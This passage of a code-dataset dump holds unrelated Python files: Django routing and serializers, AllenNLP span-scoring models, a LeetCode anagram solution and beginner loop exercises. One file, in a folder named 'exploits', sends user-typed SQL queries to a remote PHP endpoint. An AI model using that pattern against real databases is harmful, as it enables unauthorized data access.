self._is_running.value = True\n self._process.start()\n\n def stop(self):\n if self._process is None:\n raise AttributeError(\"Compressor did not start yet, cannot stop\")\n\n self._is_running.value = False\n self._input_image_queue.put(np.empty((1, 1, 3), dtype=np.uint8))\n self._process.join()\n\n @property\n def input_queue(self) -> Queue:\n return self._input_image_queue\n\n @property\n def output_queue(self) -> Queue:\n return self._output_image_queue\n","sub_path":"server/analysis/compressor/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"243267383","text":"\"\"\"project URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nimport app01.views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('',app01.views.index, name='index'),\n path('word',app01.views.word, name='word'),\n path('blog',app01.views.blog, name='blog'),\n path('new',app01.views.new, name='new'),\n path('create', app01.views.create, name='create'),\n path('detail/', app01.views.detail, name='detail'),\n path('delete/', app01.views.delete, name='delete'),\n path('update/', app01.views.update, name=\"update\"),\n path('ud/', app01.views.ud, name=\"ud\")\n]\n","sub_path":"Django/project/project/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"155542906","text":"import urllib.request\n\ndef db():\n base_url = \"http://white-db.000webhostapp.com/db-read.php\"\n a = \"?val=\"\n b = input('Enter an SQL query: ').replace(' ', '+')\n\n URL = base_url + a + b\n print('\\n')\n\n contents = str(urllib.request.urlopen(URL).read()).replace('
    ', '\\n')[2:-1]\n print(contents)\n","sub_path":"PyHack/exploits/dbread.py","file_name":"dbread.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"4284597","text":"from django.core.management.base import BaseCommand, CommandError\n\nfrom app import models\n\n_twitteruser_username = \"10sr\"\n_twitteruser_id_str = \"73722749\"\n\n\nclass Command(BaseCommand):\n help = \"Count sleep record num\"\n\n def add_arguments(self, parser):\n return\n\n def handle(self, *args, **kargs):\n try:\n user = models.TwitterUser.objects.get(username=_twitteruser_username)\n self.stdout.write(\"TwitterUser `{}' already exists\".format(user))\n except models.TwitterUser.DoesNotExist as e:\n self.stdout.write(\n \"TwitterUser {} not exists, creating\".format(_twitteruser_username)\n )\n models.TwitterUser(\n username=_twitteruser_username, id_str=_twitteruser_id_str\n ).save()\n # return\n","sub_path":"app/management/commands/local_addrecords.py","file_name":"local_addrecords.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"606065995","text":"###############################################################################################################################\n# 3 模型序列化器\n# 1. 可以帮我们自动完成字段的声明[主要是从模型中的字段声明里面提取过来]\n# 2. 模型序列化器也可以帮我们声明了create和update方法的代码\n###############################################################################################################################\nfrom rest_framework import serializers\nfrom booktest.models import BookInfo\nclass BookInfoModelSerializer(serializers.ModelSerializer):\n # 模型序列化器也可以自定义验证字段[当某些数据不存在于数据库时,但是需要前端提交过来的,可以进行自定义,\n # 例如,验证码,确认密码]\n\n class Meta:\n model=BookInfo\n fields = \"__all__\"\n # 可以给模型序列化器里面指定的字段设置限制选项\n extra_kwargs = {\n \"bread\":{\"min_value\":0,\"required\":True},\n }\n\n # 自定义验证方法[验证单个字段,可以有多个方法]\n # def validate_<字段名>(self,data): # data当前字段对应的值\n def validate_btitle(self,data):\n print(\"----获取视图类中传递过来的数据---\")\n print(self.context.get(\"view\"))\n # 可以通过视图类附带一些数据到序列化器里面直接使用 view.py的69行代码\n # print(self.context.get(\"view\").user)\n print(\"----获取视图类中传递过来的数据---\")\n # 例如,图书名不能是红楼梦\n if data==\"红楼梦\":\n # 抛出错误\n raise serializers.ValidationError(\"红楼梦是禁书~\")\n # 验证方法中,把数据值必须返回给字段,否则字段值为空\n return data\n\n # 自定义验证方法[验证多个或者所有字段,只能出现一次]\n def validate(self,data): # data 这个是所有字段的内容,字典类型\n bread = data.get(\"bread\")\n bcomment = data.get(\"bcomment\")\n if bread>=bcomment:\n return data\n raise serializers.ValidationError(\"阅读量小于评论量,数据太假了\")","sub_path":"viewdemo/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"309222404","text":"\r\nimport logging\r\nfrom collections import OrderedDict\r\nimport torch\r\nimport torch.nn as nn\r\n\r\nfrom torch.nn.modules.activation import Sigmoid, ReLU\r\n\r\nfrom allennlp.modules.conditional_random_field import ConditionalRandomField\r\nfrom allennlp.modules import FeedForward\r\nfrom allennlp.modules.span_extractors import SelfAttentiveSpanExtractor\r\nfrom allennlp.modules.span_extractors import EndpointSpanExtractor\r\nfrom allennlp.modules import TimeDistributed, Pruner\r\nfrom allennlp.nn import util\r\n\r\n\r\nfrom pytorch_models.utils import one_hot, get_activation_fn\r\nfrom pytorch_models.utils import map_dict_builder\r\nfrom pytorch_models.utils import create_mask, map_dict_builder\r\nfrom pytorch_models.training import get_entity_loss\r\n\r\nclass SpanEmbedder(nn.Module):\r\n '''\r\n Create span embeddings\r\n \r\n \r\n Parameters\r\n ----------\r\n num_tags: label vocab size\r\n \r\n Returns\r\n -------\r\n arg_scores: tensor of scores (batch_size, trig_num, arg_num, 2)\r\n \r\n '''\r\n def __init__(self, input_dim, \\\r\n use_endpoint = True, \r\n use_attention = True,\r\n combination = \"x,y\",\r\n num_width_embeddings = None,\r\n span_width_embedding_dim = None,\r\n span_end_is_exclusive = True):\r\n \r\n super(SpanEmbedder, self).__init__()\r\n \r\n self.input_dim = int(input_dim)\r\n self.use_endpoint = bool(use_endpoint)\r\n self.use_attention = bool(use_attention)\r\n self.combination = str(combination)\r\n \r\n if span_width_embedding_dim is None:\r\n self.num_width_embeddings = None\r\n feat_size = 0\r\n else:\r\n self.num_width_embeddings = num_width_embeddings\r\n feat_size = span_width_embedding_dim\r\n \r\n self.span_width_embedding_dim = span_width_embedding_dim\r\n self.span_end_is_exclusive = bool(span_end_is_exclusive)\r\n\r\n # Endpoint extractor\r\n if self.use_endpoint:\r\n self._endpoint_extractor = EndpointSpanExtractor( \\\r\n input_dim = self.input_dim,\r\n combination = self.combination,\r\n num_width_embeddings = self.num_width_embeddings,\r\n span_width_embedding_dim = self.span_width_embedding_dim,\r\n bucket_widths = False)\r\n \r\n # Self-attentive span extractor\r\n if self.use_attention:\r\n self._attentive_extractor = \\\r\n SelfAttentiveSpanExtractor(input_dim=self.input_dim)\r\n\r\n # Dimensionality of span/Input dimension for FFNN\r\n a = len(self.combination.split(','))*int(self.use_endpoint)\r\n b = int(self.use_attention)\r\n self.output_dim = self.input_dim*(a + b) + feat_size\r\n\r\n # Placeholder for decrement in span end index\r\n self.span_offset = None\r\n\r\n\r\n def forward(self, sequence_tensor, sequence_mask, \r\n span_indices, span_mask):\r\n '''\r\n Parameters\r\n ----------\r\n sequence_tensor: sequence representation (batch_size, seq_len, embed_dim)\r\n sequence_mask: sequence mask (batch_size, seq_len)\r\n span_indices: tensor of span indices (batch_size, span_num, 2)\r\n span_mask: tensor of mask (batch_size, trig_num)\r\n \r\n Returns\r\n ------- \r\n span_embed: tensor of span embeddings (batch_size, span_num, output_dim) \r\n '''\r\n \r\n # If span end indices are exclusive, subtract 1\r\n if self.span_end_is_exclusive:\r\n \r\n # Initialize span offset (decrement end indices)\r\n if (self.span_offset is None) or \\\r\n (self.span_offset.shape != span_indices.shape):\r\n \r\n self.span_offset = torch.zeros_like(span_indices, \\\r\n requires_grad=False) \r\n self.span_offset[:,:,1] = - 1\r\n \r\n # Apply offset\r\n span_indices = span_indices + self.span_offset\r\n\r\n # Initialize output\r\n span_embed = []\r\n \r\n # Endpoint embedding\r\n if self.use_endpoint:\r\n span_embed.append(self._endpoint_extractor( \\\r\n sequence_tensor = sequence_tensor,\r\n span_indices = span_indices,\r\n sequence_mask = sequence_mask,\r\n span_indices_mask = span_mask))\r\n \r\n # Attentive embedding\r\n if self.use_attention:\r\n span_embed.append(self._attentive_extractor( \\\r\n sequence_tensor = sequence_tensor,\r\n span_indices = span_indices,\r\n sequence_mask = sequence_mask,\r\n span_indices_mask = span_mask))\r\n \r\n return torch.cat(span_embed, dim=2)\r\n\r\n\r\ndef span_labels_to_scores(labels, mask, num_tags, low_val, high_val, pruner):\r\n '''\r\n Use gold labels or CRF-predicted labels to generate label scores\r\n '''\r\n \r\n # Create binary, indicator labels\r\n binary_labels = (labels > 0).type(torch.FloatTensor)\r\n binary_labels = binary_labels.to(labels.device)\r\n\r\n # Number of elements to keep\r\n num_items_to_keep = max(int(binary_labels.sum(1).max()), 1)\r\n\r\n # Add dimension to binary labels so it can be treated as an embedding\r\n embeddings = binary_labels.unsqueeze(-1)\r\n\r\n # Get spans with positive labels\r\n _, mask_top, indices_top, prune_scores_top = \\\r\n pruner(embeddings, mask, num_items_to_keep)\r\n prune_scores_top = prune_scores_top.squeeze(-1) \r\n \r\n # Span scores\r\n label_scores = one_hot(labels, num_tags, \\\r\n low_val = low_val, \r\n high_val = high_val)\r\n\r\n # Top span scores\r\n label_scores_top = util.batched_index_select( \\\r\n target = label_scores, \r\n indices = indices_top)\r\n\r\n return (mask_top, indices_top, prune_scores_top, label_scores_top)\r\n\r\n\r\nclass PassThrough(nn.Module):\r\n '''\r\n Simple pass-through \r\n '''\r\n def __init__(self):\r\n super(PassThrough, self).__init__()\r\n \r\n def forward(self, x):\r\n return x\r\n \r\nclass SpanScorerGold(nn.Module):\r\n '''\r\n Span scorer using gold labels\r\n Convert labels to one hot encoding\r\n \r\n \r\n Parameters\r\n ----------\r\n num_tags: label vocab size\r\n \r\n \r\n Returns\r\n -------\r\n arg_scores: tensor of scores (batch_size, trig_num, arg_num, num_tags)\r\n \r\n '''\r\n def __init__(self, num_tags, low_val=-5, high_val=5):\r\n super(SpanScorerGold, self).__init__()\r\n \r\n self.num_tags = num_tags\r\n self.low_val = low_val\r\n self.high_val = high_val\r\n\r\n scorer = TimeDistributed(PassThrough())\r\n self._pruner = Pruner(scorer)\r\n\r\n\r\n def forward(self, labels, mask, embed):\r\n '''\r\n Parameters\r\n ----------\r\n span_labels: tensor of labels (batch_size, num_spans)\r\n \r\n Returns\r\n -------\r\n Pulled from AllenNLP GitHub:\r\n https://github.com/allenai/allennlp/blob/master/allennlp/modules/pruner.py\r\n \r\n embed_top : ``torch.FloatTensor``\r\n The representations of the top-k scoring items.\r\n Has shape (batch_size, num_items_to_keep, embedding_size).\r\n mask_top : ``torch.LongTensor``\r\n The corresponding mask for ``embed_top``.\r\n Has shape (batch_size, num_items_to_keep).\r\n indices_top : ``torch.IntTensor``\r\n The indices of the top-k scoring items into the original ``embeddings``\r\n tensor. This is returned because it can be useful to retain pointers to\r\n the original items, if each item is being scored by multiple distinct\r\n scorers, for instance. Has shape (batch_size, num_items_to_keep).\r\n top_item_scores : ``torch.FloatTensor``\r\n The values of the top-k scoring items.\r\n Has shape (batch_size, num_items_to_keep, 1).\r\n '''\r\n\r\n # Get scores from labels\r\n mask_top, indices_top, prune_scores_top, label_scores_top, \\\r\n = span_labels_to_scores( \\\r\n labels = labels, \r\n mask = mask, \r\n num_tags = self.num_tags, \r\n low_val = self.low_val, \r\n high_val = self.high_val,\r\n pruner = self._pruner)\r\n\r\n # Get top embeddings\r\n embed_top = util.batched_index_select(embed, indices_top)\r\n\r\n \r\n return (indices_top, embed_top, mask_top, prune_scores_top, label_scores_top)\r\n\r\n\r\nclass SpanScorerCRF(nn.Module):\r\n '''\r\n Span extractor\r\n '''\r\n def __init__(self, embed_size, label_map,\r\n low_val = -5, \r\n high_val = 5, \r\n constraints = None,\r\n incl_start_end = True,\r\n ):\r\n super(SpanScorerCRF, self).__init__()\r\n\r\n self.embed_size = embed_size\r\n self.label_map = label_map\r\n self.low_val = low_val\r\n self.high_val = high_val \r\n self.constraints = constraints\r\n self.incl_start_end = incl_start_end\r\n \r\n # Number of positive tags\r\n self.num_pos_tags = len(label_map[1:])\r\n \r\n # label_map to/from BIO (0th label is negative)\r\n self.mapping_BIO = label_map[:] + label_map[1:]\r\n \r\n # Dicts for mapping to/from label indices\r\n self.label_to_id, self.id_to_label = \\\r\n map_dict_builder(self.mapping_BIO)\r\n \r\n # Number of tags, including BI prefixes \r\n self.num_tags = len(self.mapping_BIO)\r\n \r\n # Linear projection layer\r\n self.projection = nn.Linear(embed_size, self.num_tags)\r\n \r\n # Create event-specific CRF\r\n self.crf = ConditionalRandomField( \\\r\n num_tags = self.num_tags, \r\n constraints = constraints,\r\n include_start_end_transitions = incl_start_end) \r\n\r\n # Dummy pruner\r\n scorer = TimeDistributed(PassThrough())\r\n self._pruner = Pruner(scorer)\r\n\r\n def forward(self, seq_tensor, seq_mask, span_map, span_mask, embed, spans, \\\r\n span_labels=None):\r\n '''\r\n Generate predictions\r\n '''\r\n # Dimensionality\r\n batch_size, max_seq_len, input_dim = tuple(seq_tensor.shape)\r\n\r\n # Project input tensor sequence to logits\r\n logits = self.projection(seq_tensor)\r\n \r\n # Best path\r\n best_paths = self.crf.viterbi_tags( \\\r\n logits = logits, \r\n mask = seq_mask)\r\n \r\n # Separate predictions and score\r\n seq_pred, score = zip(*best_paths)\r\n seq_pred = list(seq_pred)\r\n\r\n '''\r\n Process predictions\r\n '''\r\n # Get spans from sequence tags\r\n # Converts list of list of predicted label indices to\r\n # tensor of size (batch_size, num_spans)\r\n span_pred = self._seq_tags_to_spans(seq_pred, span_map)\r\n\r\n # Get scores from labels\r\n mask_top, indices_top, prune_scores_top, label_scores_top, \\\r\n = span_labels_to_scores( \\\r\n labels = span_pred, \r\n mask = span_mask, \r\n num_tags = self.num_tags, \r\n low_val = self.low_val, \r\n high_val = self.high_val,\r\n pruner = self._pruner)\r\n\r\n # Get top embeddings\r\n embed_top = util.batched_index_select(embed, indices_top)\r\n \r\n '''\r\n Calculate loss\r\n '''\r\n # No labels provided\r\n if span_labels is None:\r\n loss = None\r\n \r\n # Span labels provided (i.e. training)\r\n else: \r\n # Convert span representation to sequence tags \r\n seq_true = self._spans_to_seq_tags(span_labels, spans, \r\n max_seq_len)\r\n # Get loss (negative log likely)\r\n loss = -self.crf( \\\r\n inputs = logits, \r\n tags = seq_true, \r\n mask = seq_mask)\r\n\r\n \r\n \r\n return (embed_top, mask_top, indices_top, prune_scores_top, \r\n label_scores_top, loss)\r\n\r\n def _to_BIO(self, span_label, start, end):\r\n '''\r\n Convert span representation to BIO representation\r\n \r\n Parameters\r\n ----------\r\n span_label: scaler tensor, span label index\r\n start: scaler tensor, span start index\r\n end: scaler tensor, span end index\r\n \r\n '''\r\n \r\n # Span length\r\n n = end - start\r\n\r\n # Inside label \r\n I = span_label + self.num_pos_tags\r\n \r\n # Initialize to inside label\r\n seq_labels = torch.zeros(n).type(torch.LongTensor) \r\n seq_labels.fill_(I)\r\n \r\n # Begin label\r\n seq_labels[0] = span_label\r\n\r\n #REMOVE\r\n #seq_labels.fill_(span_label)\r\n\r\n return seq_labels \r\n\r\n def _from_BIO(self, seq_label):\r\n '''\r\n Convert BIO representation to span representation\r\n \r\n Parameters\r\n ----------\r\n seq_label: int, span label with BIO indices\r\n '''\r\n \r\n \r\n \r\n logging.warn(\"=\"*300)\r\n logging.warn(\"TODO replace this fucntion with pytorch_models.crf.tag_to_span_lab \")\r\n logging.warn(\"=\"*300)\r\n \r\n \r\n \r\n is_outside = 0\r\n is_begin = 0\r\n is_inside = 0\r\n \r\n # Convert sequence label to span label (i.e. convert BI)\r\n if seq_label > self.num_pos_tags:\r\n span_label = seq_label - self.num_pos_tags\r\n is_inside = 1\r\n elif seq_label > 0:\r\n span_label = seq_label\r\n is_begin = 1\r\n else:\r\n span_label = seq_label\r\n is_outside = 1\r\n \r\n return (span_label, is_outside, is_begin, is_inside)\r\n\r\n\r\n\r\n def _seq_tags_to_spans(self, seq_tags, span_map):\r\n '''\r\n Convert sequence tags to span labels\r\n \r\n Parameters\r\n ----------\r\n seq_tags: list of list of label indices\r\n i.e. list of sentences, where each sentence \r\n is a list of label indices\r\n \r\n Returns\r\n -------\r\n span_labels: tensor of shape (batch_size, num_spans)\r\n \r\n '''\r\n\r\n # Get inputs for tensor initialization\r\n batch_size = len(seq_tags)\r\n num_spans = len(span_map)\r\n\r\n # Initialize span labels to null label\r\n span_labels = torch.zeros(batch_size, num_spans).type( \\\r\n torch.LongTensor)\r\n \r\n # Loop on sequences\r\n for i_seq, seq in enumerate(seq_tags):\r\n \r\n # Loop on spans\r\n for lab, start, end in self._BIO_to_span(seq):\r\n \r\n # Token indices of current span\r\n idx = (start, end)\r\n \r\n # Span in map\r\n if idx in span_map:\r\n\r\n # Span index within tensor\r\n i_span = span_map[idx]\r\n \r\n # Update label tensor\r\n span_labels[i_seq, i_span] = lab\r\n \r\n # Span not in map\r\n else:\r\n pass\r\n logging.warn(\"span not in map:\\t{}\".format(idx))\r\n\r\n \r\n return span_labels\r\n\r\n\r\n def _spans_to_seq_tags(self, labels, spans, max_seq_len):\r\n '''\r\n Convert span labels to sequence labels\r\n \r\n \r\n Parameters\r\n ----------\r\n labels: tensor of label indices (batch_size, num_spans)\r\n spans: tensor of span indices (batch_size, num_spans, 2)\r\n max_seq_len: int, maximum sequence length\r\n num_pos_tags: int, number of non-negative labels\r\n \r\n Returns\r\n -------\r\n seq_tags: tensor with BIO label indices (batch_size, max_seq_len)\r\n '''\r\n \r\n \r\n # Label dimensionality\r\n batch_size, num_spans = tuple(labels.shape)\r\n \r\n # Initialize sequence tags to 0\r\n # (batch_size, max_seq_len)\r\n seq_tags = torch.zeros(batch_size, max_seq_len).type( \\\r\n torch.LongTensor)\r\n\r\n # Find indices of all nonnegative (0) labels\r\n # (n, d) \r\n # n = number of nonzero elements, \r\n # d = number of dimensions in labels (i.e. 2)\r\n non_neg_indices = torch.nonzero(labels)\r\n \r\n # Iterate over nonnegative labels\r\n for indices in non_neg_indices:\r\n\r\n # Sequence and span indices \r\n # indices_shape (2)\r\n i_seq = indices[0]\r\n i_span = indices[1]\r\n\r\n # Label \r\n # (1)\r\n lab = labels[i_seq, i_span]\r\n \r\n # Span start and stop indices\r\n # (2)\r\n span = spans[i_seq, i_span]\r\n start = span[0]\r\n end = span[1]\r\n\r\n # Update sequence tags with BI labels\r\n seq_tags[i_seq, start:end] = self._to_BIO(lab, start, end)\r\n \r\n return seq_tags\r\n\r\n\r\n def _BIO_to_span(self, seq):\r\n '''\r\n \r\n Finds spans in BIO sequence\r\n \r\n NOTE: start span index is inclusive, end span index is exclusive\r\n e.g. like Python lists\r\n \r\n '''\r\n\r\n\r\n \r\n logging.warn(\"=\"*300)\r\n logging.warn(\"TODO replace this fucntion with pytorch_models.crf.BIO_to_span\")\r\n logging.warn(\"=\"*300) \r\n\r\n spans = []\r\n begin_count = 0\r\n start = -1\r\n end = -1\r\n active_tag = None\r\n \r\n if not any(seq):\r\n return []\r\n\r\n for i_tok, x in enumerate(seq):\r\n \r\n \r\n # Convert current sequence tag label to span label\r\n tag, is_outside, is_begin, is_inside = self._from_BIO(x)\r\n \r\n # Outside label\r\n if is_outside:\r\n \r\n # The span has ended\r\n if active_tag is not None:\r\n spans.append((active_tag, start, end))\r\n\r\n # Not in a span\r\n active_tag = None\r\n \r\n # Span beginning\r\n elif is_begin:\r\n \r\n # The span has ended\r\n if active_tag is not None:\r\n spans.append((active_tag, start, end))\r\n\r\n # Update active tag\r\n active_tag = tag\r\n \r\n # Index of current span start\r\n start = i_tok\r\n end = i_tok + 1\r\n \r\n # Increment begin count\r\n begin_count += 1\r\n \r\n # Span inside and current tag matches active tag\r\n # e.g. well-formed span\r\n elif is_inside and (tag == active_tag):\r\n end += 1\r\n \r\n # Ill formed span\r\n elif is_inside and (tag != active_tag):\r\n\r\n # Capture end of valid span\r\n if active_tag is not None:\r\n spans.append((active_tag, start, end))\r\n\r\n # Not in a span\r\n active_tag = None\r\n \r\n else:\r\n raise ValueError(\"could not assign label\")\r\n \r\n # Last token might be part of a valid span\r\n if active_tag is not None:\r\n spans.append((active_tag, start, end))\r\n\r\n # Get span count \r\n span_count = len(spans)\r\n \r\n if True and (begin_count != span_count):\r\n msg = \\\r\n '''Count mismatch:\r\n seq = {}\r\n Begin count = {}\r\n span count = {}'''.format(seq, begin_count, span_count)\r\n logging.warn(msg)\r\n\r\n return spans\r\n\r\nclass BeamScorer(nn.Module):\r\n '''\r\n \r\n '''\r\n def __init__(self, scorer, agg_type):\r\n super(BeamScorer, self).__init__()\r\n self._scorer = scorer \r\n self.agg_type = agg_type\r\n\r\n def forward(self, candidates):\r\n \r\n # Apply scorer\r\n # [batch_size, n_spans, n_labels]\r\n scores = self._scorer(candidates)\r\n \r\n # Get overall score for non-null (positive) labels\r\n # Null labels represented by label index 0\r\n if self.agg_type == 'max':\r\n pos_scores, _ = scores[:,:,1:].max(dim=-1)\r\n elif self.agg_type == 'sum':\r\n pos_scores = scores[:,:,1:].sum(dim=-1)\r\n else:\r\n raise ValueError(\"incorrect agg_type: {}\".format(self.agg_type))\r\n \r\n # Add last dimension for compliance with Pruner API\r\n # [batch_size, n_spans, 1]\r\n return pos_scores.unsqueeze(-1)\r\n\r\nclass SpanScorerPrune(nn.Module):\r\n '''\r\n Span scorer \r\n \r\n \r\n Parameters\r\n ----------\r\n num_tags: label vocab size\r\n \r\n \r\n Returns\r\n -------\r\n arg_scores: tensor of scores (batch_size, trig_num, arg_num, num_tags)\r\n \r\n '''\r\n def __init__(self, input_dim, hidden_dim, num_tags, \\\r\n activation = 'relu',\r\n dropout = 0.0,\r\n spans_per_word = 2,\r\n agg_type = 'max',\r\n loss_reduction = 'sum'):\r\n super(SpanScorerPrune, self).__init__()\r\n \r\n\r\n self.input_dim = input_dim\r\n self.hidden_dim = hidden_dim\r\n self.num_tags = num_tags\r\n \r\n self.activation = activation\r\n self.activation_fn = get_activation_fn(activation)\r\n\r\n self.dropout = dropout\r\n self.spans_per_word = spans_per_word\r\n self.agg_type = agg_type\r\n self.loss_reduction = loss_reduction\r\n \r\n \r\n self.num_layers = 1\r\n self.neg = -1e20\r\n \r\n '''\r\n Create classifier\r\n '''\r\n # Feedforward neural network for predicting span labels\r\n self._label_ffnn = FeedForward( \\\r\n input_dim = self.input_dim,\r\n num_layers = self.num_layers,\r\n hidden_dims = self.hidden_dim, \r\n activations = self.activation_fn,\r\n dropout = self.dropout)\r\n\r\n # Span classifier\r\n self._label_scorer = torch.nn.Sequential(\r\n TimeDistributed(self._label_ffnn),\r\n TimeDistributed(torch.nn.Linear(self.hidden_dim, self.num_tags)))\r\n\r\n '''\r\n Create pruner\r\n '''\r\n # Feedforward neural network for pruning score\r\n #self._pruning_ffnn = FeedForward( \\\r\n # input_dim = self.input_dim,\r\n # num_layers = self.num_layers,\r\n # hidden_dims = self.hidden_dim, \r\n # activations = self.activation,\r\n # dropout = self.dropout)\r\n\r\n # Pruning scoring function\r\n #self._pruning_scorer = torch.nn.Sequential(\r\n # TimeDistributed(self._pruning_ffnn),\r\n # TimeDistributed(torch.nn.Linear(self.hidden_dim, 1)))\r\n \r\n # Pruner\r\n self._pruning_scorer = BeamScorer(self._label_scorer, self.agg_type)\r\n self._pruner = Pruner(self._pruning_scorer) \r\n\r\n\r\n\r\n\r\n def forward(self, embed, mask, seq_lengths, span_labels=None):\r\n '''\r\n Parameters\r\n ----------\r\n span_labels: tensor of labels (batch_size, num_spans)\r\n \r\n Returns\r\n -------\r\n Pulled from AllenNLP GitHub:\r\n https://github.com/allenai/allennlp/blob/master/allennlp/modules/pruner.py\r\n \r\n embed_top : ``torch.FloatTensor``\r\n The representations of the top-k scoring items.\r\n Has shape (batch_size, num_items_to_keep, embedding_size).\r\n mask_top : ``torch.LongTensor``\r\n The corresponding mask for ``embed_top``.\r\n Has shape (batch_size, num_items_to_keep).\r\n indices_top : ``torch.IntTensor``\r\n The indices of the top-k scoring items into the original ``embeddings``\r\n tensor. This is returned because it can be useful to retain pointers to\r\n the original items, if each item is being scored by multiple distinct\r\n scorers, for instance. Has shape (batch_size, num_items_to_keep).\r\n top_item_scores : ``torch.FloatTensor``\r\n The values of the top-k scoring items.\r\n Has shape (batch_size, num_items_to_keep, 1).\r\n '''\r\n \r\n \r\n \r\n # Number of spans to keep by sentence\r\n # (batch_size)\r\n num_to_keep = seq_lengths*self.spans_per_word\r\n num_to_keep = torch.max(num_to_keep, torch.ones_like(num_to_keep))\r\n \r\n # Apply pruner to embeddings\r\n # embed_top (batch_size, max_num_to_keep, embed_dim)\r\n # mask_top, indices_top, prune_scores_top (batch_size, max_num_to_keep)\r\n # prune_scores_top (batch_size, max_num_to_keep, 1)\r\n embed_top, mask_top, indices_top, prune_scores_top = \\\r\n self._pruner(embed, mask, num_to_keep) \r\n prune_scores_top = prune_scores_top.squeeze(-1) \r\n\r\n # Compute label scores\r\n # (batch_size, num_spans, num_tags)\r\n label_scores = self._label_scorer(embed)\r\n\r\n # Give large negative scores to the masked-out values.\r\n label_scores = util.replace_masked_values( \\\r\n tensor = label_scores, \r\n mask = mask.unsqueeze(-1), \r\n replace_with = self.neg)\r\n\r\n # Top span scores\r\n label_scores_top = \\\r\n util.batched_index_select(label_scores, indices_top)\r\n\r\n if span_labels is None:\r\n loss = None\r\n else:\r\n loss = get_entity_loss( \\\r\n scores = label_scores, \r\n labels = span_labels, \r\n mask = mask,\r\n reduction = self.loss_reduction)\r\n\r\n \r\n return (embed_top, mask_top, indices_top, prune_scores_top, \r\n label_scores_top, loss)\r\n\r\n \r\n ","sub_path":"code/pytorch_models/span_scoring.py","file_name":"span_scoring.py","file_ext":"py","file_size_in_byte":27319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"423817124","text":"#\n# @lc app=leetcode id=242 lang=python3\n#\n# [242] Valid Anagram\n\n# Given two strings s and t , write a function to determine if t is an anagram of s.\n\n# Example 1:\n\n# Input: s = \"anagram\", t = \"nagaram\"\n# Output: true\n# Example 2:\n\n# Input: s = \"rat\", t = \"car\"\n# Output: false\n# Note:\n# You may assume the string contains only lowercase alphabets.\n\n# Follow up:\n# What if the inputs contain unicode characters? How would you adapt your solution to such case?\n\n\n# @lc code=start\nclass Solution:\n def isAnagram(self, s: str, t: str) -> bool:\n \n # Short and concise\n s_dict, t_dict = {}, {}\n for item in s:\n s_dict[item] = s_dict.get(item, 0)+1\n for item in t:\n t_dict[item] = t_dict.get(item, 0)+1\n\n return s_dict == t_dict\n \n \n #Long answer \n # if len(s) != len(t):\n # return False\n # s_dict = {}\n # t_dict = {}\n # for ch in s:\n # if ch not in s_dict:\n # s_dict[ch] = 1\n # else:\n # s_dict[ch] += 1\n \n # for c in t:\n # if c not in t_dict:\n # t_dict[c] = 1\n # else:\n # t_dict[c] += 1\n \n # return s_dict == t_dict \n \n\n \n# @lc code=end\n\n","sub_path":"242.valid-anagram.py","file_name":"242.valid-anagram.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"122757301","text":"#%% (1) while test\r\n\r\ncnt = 0\r\nwhile cnt != 10:\r\n cnt+=1\r\n print(str(cnt)+\". 한동석\")\r\n\r\n#%% (2) while test2\r\n\r\nqMsg = (\"Q.다음 중 프로그래밍 언어가 아닌 것은?\\n\"\r\n +\"1. JAVA\\n2. 파이썬\\n3. C언어\\n4. 망둥어\\n\"\r\n )\r\n\r\nwhile True :\r\n \r\n choice = int(input(qMsg))\r\n answer = 4\r\n \r\n if choice == answer :\r\n print(\"정답!\")\r\n break\r\n elif choice >= 1 and choice <=4:\r\n print(\"오답\")\r\n else: \r\n print(\"잘못 입력하셨습니다.\")","sub_path":"Python/day06/while.py","file_name":"while.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"99246420","text":"# coding: utf-8\n\nimport urllib2\nimport urllib\nimport urlparse\nfrom zope.component import getUtility\nfrom plone.registry.interfaces import IRegistry\nfrom collective.socialpublish.controlpanel.interfaces import ISocialPublishControlPanel\nfrom Products.Five.browser import BrowserView\n#from Products.Five.browser.pagetemplatefile import ViewPageTemplateFile\nfrom Products.CMFCore.utils import getToolByName\nfrom Products.statusmessages.interfaces import IStatusMessage\n\nfrom collective.socialpublish.events import get_page_list\nfrom collective.socialpublish.controlpanel.utils import fb_page_info_list_to_str\n\nENDPOINT = 'graph.facebook.com'\n\ndef get_url(path, args=None):\n args = args or {}\n #if ACCESS_TOKEN:\n # args['access_token'] = ACCESS_TOKEN\n if 'access_token' in args or 'client_secret' in args:\n endpoint = \"https://\" + ENDPOINT\n else:\n endpoint = \"http://\" + ENDPOINT\n return endpoint + path + '?' + urllib.urlencode(args)\n\ndef get_resource(path, args=None):\n return urllib2.urlopen(get_url(path, args=args)).read()\n\n\nclass FacebookAuth(BrowserView):\n \"\"\"\n\n \"\"\"\n #template = ViewPageTemplateFile('')\n\n def __call__(self):\n portal_messages = IStatusMessage(self.request)\n portal_url = getToolByName(self.context, 'portal_url')()\n here_url = portal_url + 